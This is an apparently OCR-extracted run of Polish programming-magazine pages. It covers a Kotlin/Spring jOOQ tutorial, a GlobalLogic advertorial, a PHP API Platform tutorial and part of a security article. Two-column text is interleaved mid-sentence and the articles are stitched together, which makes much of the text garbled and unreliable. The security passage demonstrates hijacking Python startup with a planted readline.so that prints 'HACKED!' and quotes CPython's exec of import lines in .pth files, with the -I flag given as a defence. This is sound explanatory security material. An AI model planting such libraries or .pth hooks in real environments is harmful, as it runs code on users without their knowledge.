nasz, preferuję określenie wykonania metod za pomocą @Test Zwróćmy uwagę na kilka kwestii:
MethodOrder. Poprawia to czytelność i zmniejsza ilość kodu » org.jooq.meta.extensions.ddl.DDLDatabase (https://www.
w klasie testowej. Z drugiej strony bywa też męczące i mylące jooq.org/doc/3.1/manual/code-generation/codegen-ddl/) – dzięki
przy debugowaniu, ponieważ musimy pamiętać, żeby zawsze temu nie musimy posiadać instacji bazy danych, z której gene-
uruchamiać całą klasę testową, a nie pojedynczy test. rator mógłby wygenerować pliki. Wystarczy wskazać skrypty,
» @BeforeAll – w tej metodzie ustawiamy domyślne wartości które utworzyliśmy wcześniej.
dla naszych testów. Zwróćmy uwagę, że „wstrzykujemy” port, » properties.add(Property().withKey("sort").
na którym dostępna jest nasza aplikacja. Ta metoda będzie wy- withValue("flyway"))– dzięki tej opcji generator będzie się
konana przed wszystkimi testami. Istotna jest również metoda stosował do kolejności wgrywania skryptów takiej samej jak
filter. To tutaj dołączamy walidatora, który sprawdzi zgod- Flyway, gdy wgrywa skrypty w bazie danych.
ność z OpenAPI. » packageName = "pl.programista.article.jooq" – pakiet
dla wygenerowanych klas.
Wykonując komendę gradle test, możemy wykonać testy naszej
aplikacji. Jeśli chcemy sprawdzić, czy walidator OpenAPI działa, mo- Ponadto zmodyfikowaliśmy sekcję tasks.getByName("generateJooq")
żemy w klasie Address zmienić typ pola city na String? i w endpo- i dodaliśmy blok doLast. Instrukcje z tego bloku będą wykonane na
incie, w którym zwracamy listę użytkowników, zamiast Porto wpisać końcu funkcji generateJooq (task w Gradle – https://docs.gradle.
null. Test „Should return users” nie wykona się poprawnie. org/current/dsl/org.gradle.api.Task.html), w której Jooq generuje pliki.
Przyjrzyjmy się teraz warstwie bazodanowej. Jak już wspomnia- Dzięki takiemu podejściu mamy kontrolę nad tymi plikami, które
łem wcześniej, skorzystamy z biblioteki Flyway, która domyślnie ostatecznie trafiają do projektu. Można w sekcji copy dodać meto-
szuka skryptów (SQL) w katalogu article\src\main\resources\db\ dy include albo exclude, żeby odfiltrować niechciane pliki. Czę-
migration. Należy więc skopiować wszystkie pliki z tego samego sto bywa tak, że takiej możliwości nie mamy na etapie konfiguracji
katalogu z dostarczonego projektu. Tutaj trzeba zwrócić uwagę na wtyczki generującej kod.
ich nazewnictwo (https://flywaydb.org/documentation/concepts/ Przejdźmy do konfiguracji bazy danych dla testów. W tym celu
migrations#naming), które określa kolejność wykonywania skryp- w article\src\test\resources należy utworzyć plik application.properties
tów w bazie danych. Flyway utworzy ponadto tabelę, dzięki której z poniższą zawartością:
będzie w stanie stwierdzić, co zostało już wykonane.
Listing 6. Ustawienia testowe aplikacji
Dodajmy teraz wtyczkę Jooq do sekcji plugins w pliku build.gra-
dle.kts: spring.datasource.url=jdbc:h2:mem:testdb
spring.datasource.driverClassName=org.h2.Driver
spring.datasource.username=sa
id("nu.studer.jooq") version "6.0" spring.datasource.password=password
oraz w sekcji dependencies: W ten sposób skonfigurowaliśmy bazę danych h2, która będzie bazą
pamięciową, a więc za każdym razem, gdy wykonamy testy, będzie
jooqGenerator("org.jooq:jooq-meta-extensions:3.15.1")
jooqGenerator("com.h2database:h2") używana nowa instancja. Listę dostępnych ustawień Spring Boota
można sprawdzić w dokumentacji na stronie:
Następnie skompilujmy projekt i dodajmy na końcu skryptu poniż- https://docs.spring.io/spring-boot/docs/current/reference/html/applica-
szy kod: tion-properties.html#application-properties.data.
Prawdopodobnie podczas pisania artykułu natrafiłem na buga.
sourceSets {
main { W przypadku gdyby wystąpił problem ze zbudowaniem projektu
java { (gradle clean build), adnotację @SpringBootApplication w klasie
srcDir("src/generated-jooq/kotlin")
} ArticleApplication.kt należy zmodyfikować w poniższy sposób:
}
} Listing 7. Modyfikacja SpringBootApplication
@SpringBootApplication(
exclude = [R2dbcAutoConfiguration::class])
Sekcja sourceSets określa katalogi ze źródłami (https://docs.gradle.
org/current/dsl/org.gradle.api.tasks.SourceSet.html). Domyślnie mamy Jak widać, domyślna autokonfiguracja to czasem obosieczny miecz.
dwa takie sety: main oraz test. Odnoszą się one do katalogów, od- Powyższym sposobem można jednak zapobiec takiej sytuacji.
powiednio article\src\main oraz article\src\test. Za pomocą przed- Wykonajmy teraz polecenie gradle generateJooq. W katalogu
stawionego powyżej kodu dodajemy do main źródła z katalogu src/ \article\src\generated-jooq powinniśmy zobaczyć wygenerowane źró-
generated-jooq. Składnia jest tu nieco myląca ze względu na słowo dła odzwierciedlające naszą bazę danych.
{ WWW.PROGRAMISTAMAG.PL } <27>
PROGRAMOWANIE ROZWIĄZAŃ SERWEROWYCH
Czas zacząć to wszystko spinać w całość. Skopiujmy z projektu kla- Następnie dodajmy UserRepository.kt:
sę UserResourceTest. Będziemy teraz po kolei implementować nasze
Listing 10. Klasa UserRepository
endpointy, tak aby testy zaczęły wykonywać się poprawnie. Wszystkie
metody w UserResource.kt należy zastąpić następującymi: package pl.programista.article
import org.jooq.DSLContext
Listing 8. Niezaimplementowane endpointy
import org.springframework.stereotype.Repository
import pl.programista.article.jooq.tables
@GetMapping
.records.AddressRecord
fun findUsers(): ResponseEntity<List<User>> {
throw NotImplementedError() import pl.programista.article.jooq.tables
} .records.UserRecord
import pl.programista.article.jooq.tables
@PostMapping() .references.ADDRESS
fun createUser(@RequestBody user: User) import pl.programista.article.jooq.tables
: ResponseEntity<User> { .references.USER
throw NotImplementedError()
} @Repository
@GetMapping("/{userId}") class UserRepository(private val dslContext
fun findUser(@PathVariable("userId") userId: Long) : DSLContext) {
: ResponseEntity<User> {
fun findAll(): List<UserRecord>
throw NotImplementedError()
} = dslContext.selectFrom(USER).fetch();
@RestController
Listing 11. Klasa UserService class UserResource(private val userService
: UserService) {
package pl.programista.article
@GetMapping
import org.mapstruct.factory.Mappers fun findUsers(): ResponseEntity<List<User>> =
import org.springframework.stereotype.Service ResponseEntity(userService.findAll(), HttpStatus.OK)
import org.springframework.transaction
.annotation.Transactional @PostMapping()
import pl.programista.article.jooq fun createUser(@RequestBody user: User)
.keys.ADDRESS_U_ID_FK : ResponseEntity<User>
import pl.programista.article.jooq.tables = ResponseEntity(userService.save(user)
.records.UserRecord , HttpStatus.CREATED)
@Service …
class UserService(
private val userRepository: UserRepository
) {
Zaimplementowaliśmy tutaj dwa endpointy. Teraz część testów po-
private val userMapper: UserMapper = Mappers.
getMapper(UserMapper::class.java) winna wykonać się prawidłowo. Proszę zwrócić uwagę na test „Sho-
fun findAll(): List<User>
uld create user”. Zachęcam do zaimplementowania reszty we wła-
= userRepository.findAll() snym zakresie.
.map {
val addresses
Usługę można uruchomić poleceniem gradle bootRun albo z kon-
= it.fetchChildren(ADDRESS_U_ID_FK) soli komendą java -jar article-0.0.1-SNAPSHOT.jar. Aplikacja
userMapper.toUser(it, addresses)
} z projektu uruchamiana jest na porcie 8091. Następnie wchodząc na
@Transactional
adres http://localhost:8091/users, powinniśmy w odpowiedzi otrzy-
fun save(user: User): User { mać pusta tablicę JSONową, ponieważ nie mamy utworzonego żad-
var userRecord: UserRecord
= userMapper.toUsersRecord(user) nego użytkownika.
userRecord Do wykonywania zapytań RESTowych można też użyć narzędzia
= userRepository.upsert(userRecord)
postman (https://www.postman.com/). Po zainstalowaniu należy za-
var addressesRecords
= userMapper.toAddressesRecords(user.addresses)
importować nasz plik article-api.yml (upewniając się, że zaznaczone
addressesRecords jest utworzenie kolekcji). Postman na jego podstawie utworzy nam
.mapNotNull { it.aId }
.let { userRepository.deleteAllAddressesByIdNotIn(it) } kolekcję zapytań.
Mam nadzieję, że powyższy artykuł okaże się przydatny. Zaprezen-
addressesRecords
.forEach { it.uId = userRecord.uId } towane tu podejścia nie są jedynymi słusznymi. Najważniejszym jest,
userRepository.upsert(addressesRecords)
by w ramach projektu trzymać się wcześniej wybranych rozwiązań.
addressesRecords
= userRecord.fetchChildren(ADDRESS_U_ID_FK)
return userMapper
ŁUKASZ KOKOT
Od wielu lat pisze w Javie. Coraz chętniej i częściej programuje również w Kotlinie. Przygodę z tym
językiem zaczął od pisania skryptów i pluginów w Gradle na potrzeby projektów zawodowych. Obecnie
pracuje na stanowisku Starszego Programisty w Grupie WASKO. W wolnej chwili wędruje po górach,
a także spędza czas ze znajomymi przy planszówkach.
{ WWW.PROGRAMISTAMAG.PL } <29>
Nawet najbardziej rozchwytywany zawód
świata nie jest gwarantem pracy w przyszłości
Każdy nowy zawód odpowiada na konkretną potrzebę. Dzięki wynalazkom
oraz rozwojowi społecznemu w przeszłości powstały takie profesje, jak para-
solnik, mleczarz czy latarnik. Z biegiem czasu straciły jednak na znaczeniu.
Masowa produkcja sprawiła, że zepsute parasole się wyrzuca, bo dużo taniej
i łatwiej kupić nowe, mleko dostępne jest w każdym sklepie, a latarnie zapa-
la za ludzi komputer. Choć wydaje się to nieprawdopodobne, branża IT rów-
nież nie jest wolna od takiego ryzyka. Niektóre profesje w jej obrębie mogą
w przyszłości także odejść do lamusa.
O tym, jak nieobliczalny może być rynek pracy i jak dynamicznie bardziej w chwili, gdy algorytmy zaczną prezentować wnioski w zro-
się zmienia, świadczy przykład data scientist. Na początku poprzed- zumiałej i wygodnej dla człowieka formule.
niej dekady profesja została uznana przez Harvard Business Re- Specjaliści z branży IT są obecnie niezwykle pożądani na rynku
view za najseksowniejszy zawód XXI wieku. Dzisiaj prognozuje się,
1
pracy i wydawałoby się, że nie muszą martwić się o zawodową przy-
że wkrótce nie będzie już potrzebna. Wszystko za sprawą postępów szłość. Nic bardziej mylnego. Nawet oni nie są wolni od zagrożeń,
czynionych przez sztuczną inteligencję, która z powodzeniem może które mogą wpływać na dalszą karierę. Wielu inżynierów i develo-
analizować dane, ale również opracowywać je w konstruktywny spo- perów zdaje sobie z tego sprawę i podczas poszukiwania pracy zwra-
sób. Pozycja osób pracujących jako data scientist osłabnie jeszcze ca uwagę przede wszystkim na rodzaj projektu, a także na branżę,
w której działają klienci pracodawcy. Kluczowe znaczenie mają tech-
1. https://hbr.org/2012/10/data-scientist-the-sexiest-job-of-the-21st-century
zauważyło znaczącą zmianę w umiejętnościach potrzebnych na ich Chcesz zmieniać świat pacjentów, kierowców, konsumen-
stanowiskach, która nastąpiła w ciągu zaledwie pięciu lat. Nowe tów? Wpływać na sposób funkcjonowania banków, fabryk
i wielkich wydawców mediowych? Możesz to zrobić w Glo-
rozwiązania technologiczne ułatwiają pracę w wielu zawodach, czę- balLogic, pracując w modelu zdalnym lub hybrydowym bądź
sto też zmieniają sposób wykonywania pewnych czynności, dlatego też stacjonarnie w jednym z sześciu biur zlokalizowanych we
specjaliści muszą nieustannie kontrolować sytuację i starać się z tych Wrocławiu, Krakowie, Szczecinie, Koszalinie, Zielonej Górze
i Bydgoszczy.
możliwości robić praktyczny użytek. Jednocześnie 94% ankietowa- W jakich technologiach możesz się rozwijać i specjalizo-
nych podkreśliło, że widzi szanse na dalszy rozwój kariery tylko www wać?
edukacji i szkoleniach. » Java
» Embedded C/C++
Na co więc warto zwracać uwagę, aplikując do pracy w IT? » AUTOSAR
Na pewno na oferowane możliwości rozwoju i poszerzania wiedzy. » IoT
Czołowe firmy z sektora rozwijają intensywnie zespoły L&D (Lear- » technologiach związanych z Quality Assurance
ning and Development), które całą swoją uwagę koncentrują właśnie A to tylko wycinek możliwości, które u nas znajdziesz! Poznaj
nas i nasze projekty. Znajdź propozycję idealną dla siebie na
na tym aspekcie. Taki dział prężnie działa w GlobalLogic, dbając
https://www.globallogic.com/pl/careers/.
o zadowolenie specjalistów z rozwoju zawodowego.
Na czym polega jego rola? Skrupulatnie obserwuje rynki i wska-
zuje pracownikom możliwości rozwoju, które się przed nimi otwie-
rają, a także blisko współpracuje z organizacjami, które wyznaczają
trendy i wprowadzają innowacje w swoich sektorach. Przykładem XXI wieku, który – mimo znakomitego fachu w rękach – z czasem
tego rodzaju aktywności jest „GlobalLogic Academy. Course: AUTO- straci swoją pozycję, nie nadążając za szybkim postępem technolo-
SAR”, w której praktyczne umiejętności zdobywają programiści i inży- gicznym lub przegrywając z ambitnymi konkurentami. Dlatego, szu-
nierowie zaangażowani w projekty automotive. Reagujemy w ten spo- kając pracy, warto zwracać uwagę na oferty, które rozwój zawodowy
sób na rosnące wymagania techniczne i nowe standardy projektowania nie tylko ułatwiają, ale wręcz stawiają na pierwszym planie.
aplikacji, pozwalając naszym kadrom być z nimi na bieżąco – mówi
Artur Perwenis, Associate Vice President w GlobalLogic.
Utarte powiedzenie „kto się nie rozwija, ten się cofa” jest w branży
IT traktowane bardzo poważnie. Nikt nie chce zostać rzemieślnikiem
WSTĘP
API w kontekście tworzenia systemów i aplikacji ma dość szerokie
znaczenie – jest to zestaw reguł i opisów wyznaczających sposób Hydra+JSON-LD
komunikacji pomiędzy poszczególnymi komponentami, czy nawet JSON-LD to format serializacji danych używany w komunikacji między serwerem a jego
klientami.
osobnymi aplikacjami. W tym artykule skupimy się na aplikacjach Hydra Core Vocabulary to zdefiniowane słownictwo, które nadaje znaczenie dla po-
stosujących w komunikacji protokół HTTP, który najbardziej znany szczególnych zapytań. Dzięki wykorzystaniu Hydra+JSON-LD możemy tworzyć gene-
ryczne klasy do obsługi naszych API. Więcej o tym standardzie można przeczytać pod
jest z wykorzystania w aplikacjach internetowych. Na przestrzeni lat adresem https://www.hydra-cg.com/.
rozwijały się różne koncepcje mające na celu ustandaryzować wy-
mianę informacji za pomocą tego protokołu, czego dorobkiem jest » CRUD (Creating, Retriving, Updating and Deleting) – umożli-
m.in. HATEOAS (będący ograniczeniem architektury) czy REST wiające tworzenie, pobieranie, aktualizację i usuwanie danych
(narzucający koncepcję budowania dynamicznych odpowiedzi za w naszych zasobach.
pomocą hipermediów). Jednakże samo stworzenie interfejsu nasłu- » Walidację danych.
chującego najczęściej nie wystarczy – aby inni programiści mogli » Paginację.
wykorzystać nasze dzieło, powinniśmy je także odpowiednio udoku- » Filtrowanie.
mentować, w czym pomóc może specyfikacja OpenAPI. To wszyst- » Sortowanie.
ko jest dostarczane i częściowo generowane przez API Platform. » Dokumentację OpenAPI/Swagger UI.
W dalszej części tekstu poznamy poszczególne składowe nowocze-
snego WebAPI, a także stworzymy działającą aplikację umożliwiającą Ponadto platforma oferuje nam dodatkowe benefity w postaci m.in.
proste zarządzanie zasobami. wsparcia dla negocjacji zwracanego formatu, możliwości tworzenia
API całkowicie nie-RESTowego opartego o język zapytań GraphQL,
WYMAGANIA
Zanim przystąpimy do dalszej części artykułu, należy się upewnić, czy
mamy zainstalowane następujące narzędzia:
» PHP (w wersji 7.4+) z modułami Ctype, iconv, JSON, PCRE,
Rysunek 1. Pusta dokumentacja Swaggera
Session, SimpleXML, Tokenizer.
» Serwer MySQL (ze stworzoną bazą danych o nazwie „homestuff ”).
» Composer (https://getcomposer.org/). Ostatnim krokiem, który powinniśmy wykonać po instalacji, jest
» Symfony CLI (https://symfony.com/download). konfiguracja połączenia z bazą danych. Założyliśmy, że wykorzy-
stujemy serwer MySQL. Tworzymy więc bazę danych o nazwie „ho-
DO DZIEŁA – INSTALUJEMY API mestuff ”, a następnie otwieramy plik .env znajdujący się w głównym
folderze, odnajdujemy wpis DATABASE_URL i modyfikujemy na pod-
PLATFORM stawie konfiguracji naszego serwera MySQL. Poniższy przykład za-
Na początek zweryfikujmy, czy niczego nam nie brakuje. Symfony kłada, że posiadamy użytkownika root, hasło password oraz utwo-
ma wbudowany mechanizm do weryfikacji podstawowych zależno- rzoną bazę danych „homestuff ”, a MySQL w wersji 8.0 nasłuchuje
ści. Uruchamiamy więc poniższą komendę i upewniamy się, że otrzy- u nas lokalnie pod 127.0.0.1 na porcie 3306.
maliśmy komunikat o tym, że system jest gotowy do uruchamiania
DATABASE_URL="mysql://root:[email protected]:3306/
projektów Symfony: homestuff?serverVersion=8.0"
$ symfony check:requirements
UTWORZENIE PIERWSZEJ DEFINICJI
ZASOBU
Jeżeli jest inaczej, to weryfikujemy treść komunikatu i upewniamy
się, że zainstalowaliśmy wyżej wskazane narzędzia. W zależności od Definicja określa, jakie informacje będziemy przechowywać na temat
systemu operacyjnego sposób instalacji będzie się różnić. Szukając naszego assetu, a sam zasób jest konkretnym obiektem zawierającym
instrukcji, należy wziąć także pod uwagę naszą dystrybucję. informacje.
Następnie tworzymy nowy projekt z wykorzystaniem narzędzia Do utworzenia naszej pierwszej definicji zasobu wykorzystamy
Symfony CLI. Ja nazwałem go homestuff. Uruchamiamy komendę narzędzie maker wchodzące w skład arsenału Symfony. W projekcie
w miejscu, w którym będziemy chcieli utworzyć projekt: za pierwszym razem doinstalowujemy je za pomocą komendy:
W nowo utworzonym folderze homestuff znajdują się pliki z puste- Dzięki temu do naszej dyspozycji będzie dostępna komenda:
go szkieletu Symfony. Przechodzimy w konsoli do folderu homestuff,
$ ./bin/console make:entity
a następnie uruchamiamy serwer za pomocą polecenia:
$ symfony server:start
uruchamiająca kreator, który przeprowadzi nas krok po kroku przez
utworzenie pierwszej definicji. Chcielibyśmy utworzyć encję Item,
Domyślnie Symfony uruchamia serwer developerski nasłuchujący która zawierać będzie pola: name, createdAt, warrantyTo.
pod adresem http://127.0.0.1:8000 – wchodzimy pod ten link, wyko-
Listing 1. Tworzenie encji Item
rzystując przeglądarkę, i sprawdzamy, czy naszym oczom ukazuje się
strona witająca frameworka. $ ./bin/console make:entity
Następnie przechodzimy do instalacji API Platform z wykorzy- Class name of the entity to create or update
(e.g. OrangeGnome):
staniem narzędzia composer. W folderze z nowo utworzonym pro- > Item
jektem wywołujemy komendę: Mark this class as an API Platform resource
(expose a CRUD API for it) (yes/no) [no]:
$ composer require api-platform > yes
created: src/Entity/Item.php
created: src/Repository/ItemRepository.php UTWORZENIE I ZAINSTALOWANIE
Entity generated! Now let’s add some fields!
MIGRACJI
You can always add more fields later manually
or by re-running this command. Aby tabela, która będzie docelowo przechowywać informacje o na-
New property name (press <return> to stop adding szym zasobie, trafiła do bazy, należy wygenerować (na podstawie
fields): utworzonej przez skrypt encji) migrację, a następnie ją zainstalować.
> name
Zgodnie więc z zaleceniem kreatora uruchamiamy komendę, któ-
Field type (enter ? to see all types) [string]:
> string ra wygeneruje nam plik migracji:
Field length [255]:
$ ./bin/console make:migration
> 255
updated: src/Entity/Item.php
Add another property? Enter the property name Za pomocą klienta MySQL weryfikujemy, czy tabela poprawnie zain-
(or press <return> to stop adding fields):
> warrantyTo stalowała się w bazie.
Field type (enter ? to see all types) [string]: Listing 3. Weryfikacja tabel w MySQL po uruchomieniu migracji
> date
Can this field be null in the database (nullable) mysql> use homestuff;
(yes/no) [no]: Database changed
> yes mysql> show tables;
updated: src/Entity/Item.php +-----------------------------+
| Tables_in_homestuff |
Add another property? Enter the property name +-----------------------------+
(or press <return> to stop adding fields): | doctrine_migration_versions |
> | item |
+-----------------------------+
Success! 2 rows in set (0,00 sec)
Next: When you’re ready, create a migration with mysql> explain item;
php bin/console make:migration +-------------+--------------+
| Field | Type |
+-------------+--------------+
Zwróćmy uwagę na to, że w projekcie pojawiły się nowe pliki utwo- | id | int |
| name | varchar(255) |
rzone przez kreator: | created_at | datetime |
| warranty_to | date |
src/ +-------------+--------------+
├── Entity 4 rows in set (0,00 sec)
│ └── Item.php
└── Repository
└── ItemRepository.php Jak widać – tabela item została utworzona.
{ WWW.PROGRAMISTAMAG.PL } <35>
PROGRAMOWANIE APLIKACJI WEBOWYCH
Aby zweryfikować, czy API działa poprawnie, stwórzmy nowy za- A następnie skorzystajmy w SwaggerUI z operacji GET (podobnie
sób – wybierzmy operację POST, a następnie kliknijmy przycisk „Try jak wcześniej robiliśmy z POST), używając przycisku „Try it out”, a na-
it out”. stępnie wysyłamy zapytanie za pomocą „Execute”.
W polu Request body dokonajmy drobnych modyfikacji. Poniżej powinniśmy otrzymać odpowiedź w formacie JSON+LD,
w której widoczne będą znaczniki Hydra uspójniające nasze API.
Listing 4. Request body wysyłany na POST /api/items
Listing 7. Odpowiedź z serwera – kolekcja zasobów Item
{
"name": "Monitor LG123 50",
{
"createdAt": "2021-08-01T10:10:10.0Z",
"@context": "/api/contexts/Item",
"warrantyTo": "2022-01-01"
"@id": "/api/items",
}
"@type": "hydra:Collection",
"hydra:member": [
{
"@id": "/api/items/1",
A następnie kliknijmy przycisk „Execute”. "@type": "Item",
Poniżej powinniśmy uzyskać status 201 wraz z odpowiedzią infor- "id": 1,
"name": "Monitor LG123 50",
mującą nas o nowo utworzonym zasobie, a nawet jego identyfikatorze. "createdAt": "2021-08-01T10:10:10+02:00",
"warrantyTo": "2022-01-01T00:00:00+01:00"
Listing 5. Odpowiedź z serwera po utworzeniu zasobu }
],
{ "hydra:totalItems": 1
"@context": "/api/contexts/Item", }
"@id": "/api/items/1",
"@type": "Item",
"id": 1,
"name": "Monitor LG123 50", Posiadamy już więc w pełni funkcjonalne API, które pozwala na two-
"createdAt": "2021-08-01T10:10:10+02:00",
"warrantyTo": "2022-01-01T00:00:00+01:00"
rzenie i odczytywanie przedmiotów.
} Brakuje nam jeszcze jednej ważnej rzeczy – podstawowych infor-
macji na temat naszego API w Swagger UI. Udajmy się więc do pliku
Zauważmy, że w nowo otrzymanej odpowiedzi poza podstawowymi config/packages/api_platform.yaml w naszym projekcie i pod znacz-
informacjami znajduje się także kilka danych specjalnych poprzedzo- nik api_platform w formacie YAMLowym dodajmy następujące
nych znakiem @ – są to informacje pochodzące z formatu JSON-LD. wpisy: title, description oraz version. Całość będzie wyglądać
Zweryfikujmy za pomocą klienta MySQL, czy zasób trafił do bazy mniej więcej tak:
danych.
Listing 8. Plik api_platform.yaml z dodanymi podstawowymi informacjami
Listing 6. Sprawdzenie zawartości tabeli item
api_platform:
title: 'HomeStuff Manager'
mysql> select * from item;
description: 'API to manage my home stuff'
+----+------------------+---------------------+-------------+
version: '0.1.0'
| id | name | created_at | warranty_to |
mapping:
+----+------------------+---------------------+-------------+
paths: ['%kernel.project_dir%/src/Entity']
| 1 | Monitor LG123 50 | 2021-08-01 10:10:10 | 2022-01-01 |
patch_formats:
+----+------------------+---------------------+-------------+
json: ['application/merge-patch+json']
1 row in set (0,00 sec)
swagger:
versions: [3]
Field type (enter ? to see all types) [string]: New property name (press <return> to stop adding fields):
> > categoryId
Field length [255]: Field type (enter ? to see all types) [integer]:
> > relation
Can this field be null in the database (nullable) (yes/no) [no]: What class should this entity be related to?:
> > Category
updated: src/Entity/Category.php A new property will also be added to the Category class so that
you can access the related Item objects from it.
Add another property? Enter the property name
(or press <return> to stop adding fields): New field name inside Category [items]:
> >
{ WWW.PROGRAMISTAMAG.PL } <37>
PROGRAMOWANIE APLIKACJI WEBOWYCH
Następnie uruchamiamy ponownie migracje: W rezultacie powinniśmy otrzymać odpowiedź z serwera wska-
zującą na to, że kategoria została dowiązana do naszego produktu.
$ ./bin/console make:migration
$ ./bin/console doctrine:migrations:migrate Listing 14. Odpowiedź po aktualizacji encji Item
Jest jedna szczególna rzecz, którą mogliśmy jak dotąd dostrzec – re-
lacje przedstawiane są nie jako integer, tylko jako string. Wynika to Co potwierdza także listing kategorii, ponieważ po wyszukaniu ich
z tego, że relacje w ekosystemie API Platform wykorzystują standard za pomocą GET otrzymujemy informację o tym, że produkt o identy-
internetowy IRI, po którym następuje wiązanie. fikatorze 1 jest przypisany do kategorii o identyfikatorze 5.
Spróbujmy więc za pomocą Swagger UI utworzyć nową kategorię,
Listing 15. Pobranie kolekcji encji Category z GET /api/categories
wykorzystując operację POST przy /api/categories.
(...)
Listing 11. Request body wysyłany na POST /api/categories {
"@id": "/api/categories/5",
{ "@type": "Category",
"name": "Monitory", "id": 5,
"createdAt": "2021-08-15T10:00:00.000Z" "name": "Monitory",
} "createdAt": "2021-08-19T04:15:53+02:00",
"items": [
"/api/items/1"
]
Po wykonaniu tej operacji zwróćmy uwagę na dane, które otrzymali- }
śmy w zwrotce.
(...)
Listing 12. Odpowiedź po utworzeniu kategorii
PODSUMOWANIE
{
"@context": "/api/contexts/Category",
"@id": "/api/categories/5",
"@type": "Category", To, co zrealizowaliśmy, jest zaledwie wierzchołkiem góry lodowej
"id": 5,
"name": "Monitory", możliwości API Platform. Wkładając w to bardzo niewiele pracy, uda-
"createdAt": "2021-08-19T04:15:53+02:00",
"items": []
ło nam się uzyskać działające API, które dostarcza nam możliwość
} zarządzania dwoma typami zasobów, a także wiązania ich w relacje.
Jednocześnie została wygenerowana dokumentacja w standardzie
Ważny jest dla nas identyfikator @id – zawiera on IRI danego zasobu. OpenAPI, z której korzysta Swagger UI wbudowany w narzędzie.
Następnie zwiążmy ją z naszym istniejącym, utworzonym wcze- W następnym numerze omówimy kolejne tematy związane z bu-
śniej przedmiotem „Monitor LG123 50”, który ma identyfikator 1, dową aplikacji webowych za pomocą RESTowego API w języku PHP.
za pomocą operacji PATCH na ścieżce /api/items/{id} (uwzględniając Powiemy m.in. o zasadach paginacji, filtrowania, sortowania i wali-
konieczność przekazania identyfikatora zasobu w parametrze, a nie dacji za pomocą API Platform i jego rozszerzeń.
w request body – w tym przypadku 1). Wysyłamy więc za pomocą Osobom zainteresowanym wykorzystaniem narzędzia polecam
Swagger UI zapytanie z parametrem id: 1 oraz Request body: lekturę dokumentacji znajdującej się pod adresem https://api-platform.
com/docs. Prezentuje ona również inne sposoby instalacji API Plat-
Listing 13. Request body wysyłany na PATCH /api/items/{id}
form, w tym z wykorzystaniem kontenerów Dockerowych, co zdecy-
{ dowanie ułatwi start bardziej doświadczonym użytkownikom.
"categoryId": "/api/categories/5"
}
ADRIAN CHOJNICKI
[email protected]
Współwłaściciel Global4Net, architekt rozwiązań chmurowych. Specjalizuje się w tworzeniu aplikacji e-commerce z wyko-
rzystaniem PWA oraz platformy Magento. Propaguje wykorzystanie mikroserwisów jako skalowalne wsparcie dla systemów
monolitycznych.
thona w trybie interaktywnym poleceniem python (bez podawania // wyświetlamy zawartość katalogu
# ls -la
żadnego skryptu), interpreter próbuje załadować bibliotekę readline2 total 28
z obecnego katalogu, czego konsekwencją jest wykonanie jej kodu. drwxrwxr-x 2 dc dc 4096 Aug 22 13:37 .
Rysunek 1: Statystyki otwieranych (Opened) i zamykanych (Closed) zgłoszeń w danym tygodniu [1]
Rysunek 2. Roczne statystyki wszystkich (Total) oraz zamykanych (Opened) zgłoszeń [1]
drwxr-xr-x 124 dc dc 12288 Aug 22 13:37 .. rowane są wszystkie zmienne środowiskowe zaczynające się od ciągu
-rw-rw-r-- 1 dc dc 94 Aug 22 13:37 fakereadline.c
PYTHON (PYTHONPATH itd. [5]).
-rw-rw-r-- 1 dc dc 7896 Aug 22 13:37 readline.so
Uruchomienie interpretera z flagą -I możemy zobaczyć w Listin-
// uruchamiając Pythona 2, wykonywany jest złośliwy kod
# python2 gu 3. Jak widać, nasz „złośliwy kod” nie został wykonany.
Python 2.7.17 (default, Feb 27 2021, 15:10:58)
[GCC 7.5.0] on linux2 Listing 3. Uruchamianie interpretera z flagą -I w katalogu ze spreparowaną
Type "help", "copyright", "credits" or biblioteką readline.so
"license" for more information.
HACKED! // wyświetlamy zawartość katalogu
>>> # ls -la
// uruchamiając Pythona 3, wykonywany jest złośliwy kod total 28
# python3 drwxrwxr-x 2 dc dc 4096 Aug 22 13:37 .
Python 3.6.9 (default, Jan 26 2021, 15:33:00) drwxr-xr-x 124 dc dc 12288 Aug 22 13:37 ..
[GCC 8.4.0] on linux -rw-rw-r-- 1 dc dc 94 Aug 22 13:37 fakereadline.c
Type "help", "copyright", "credits" or -rw-rw-r-- 1 dc dc 7896 Aug 22 13:37 readline.so
"license" for more information. // uruchamiając Pythona 2 z flagą -I, biblioteka readline
HACKED! // nie jest ładowana
>>> # python2 -I
Python 2.7.17 (default, Feb 27 2021, 15:10:58)
[GCC 7.5.0] on linux2
Jak się zabezpieczyć? Type "help", "copyright", "credits" or "license" for more information.
>>>
Jak wynika z dyskusji toczącej się nad zgłoszonym błędem, którą
// uruchamiając Pythona 3 z flagą -I, biblioteka readline nie
w formie zrzutu ekranu zamieszczono na Rysunku 3, dotychczas nie // jest ładowana
zmieniono tego zachowania, gdyż może ono zepsuć istniejące apli- # python3 -I
Python 3.6.9 (default, Jan 26 2021, 15:33:00)
kacje. Zamiast tego wprowadzono możliwość uruchomienia inter- [GCC 8.4.0] on linux
pretera w trybie izolacji poprzez podanie flagi -I, co spowoduje, że Type "help", "copyright", "credits" or "license" for more information.
>>>
biblioteka readline nie będzie ładowana. Flaga ta sprawia też, że igno-
Rysunek 3. Fragment dyskusji nt. błędu związanego z automatycznym ładowaniem biblioteki readline przez interpreter Pythona
{ WWW.PROGRAMISTAMAG.PL } <43>
BEZPIECZEŃSTWO
$ mv readline.so _json.so
$ python3
Python 3.6.9 (default, Jan 26 2021, 15:33:00)
[GCC 8.4.0] on linux
Type "help", "copyright", "credits" or
"license" for more information. Rysunek 4. Notka dotycząca plików .pth w dokumentacji Pythona [7]
>>> a
HACKED!
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
Procesowanie plików .pth
NameError: name 'a' is not defined CPython procesuje pliki .pth w dość specyficzny sposób: mianowicie
>>>+*/
przechodzi po każdej linii takiego pliku i gdy natrafi na słowo kluczo-
we import w danej linii, wykonuje ją przez funkcję exec, co możemy
Wykonanie kodu przy starcie interpretera przez
zobaczyć w Listingu 7.
pliki pth zainstalowane z zewnętrznego modułu
Listing 7. Kod CPythona, który skanuje kolejne linie pliku .pth i wykonuje
te zaczynające się od słowa import [8]
Oryginalny tytuł: Deprecate and remove code execution in pth files
for n, line in enumerate(f):
Link / w wersji: https://bugs.python.org/issue33944 / Python 3.x if line.startswith("#"):
continue
Zgłoszono: 2018-06-22 try:
if line.startswith(("import ", "import\t")):
exec(line)
continue
Drugi błąd, który omówimy, dotyczy plików .pth, czyli „plików kon-
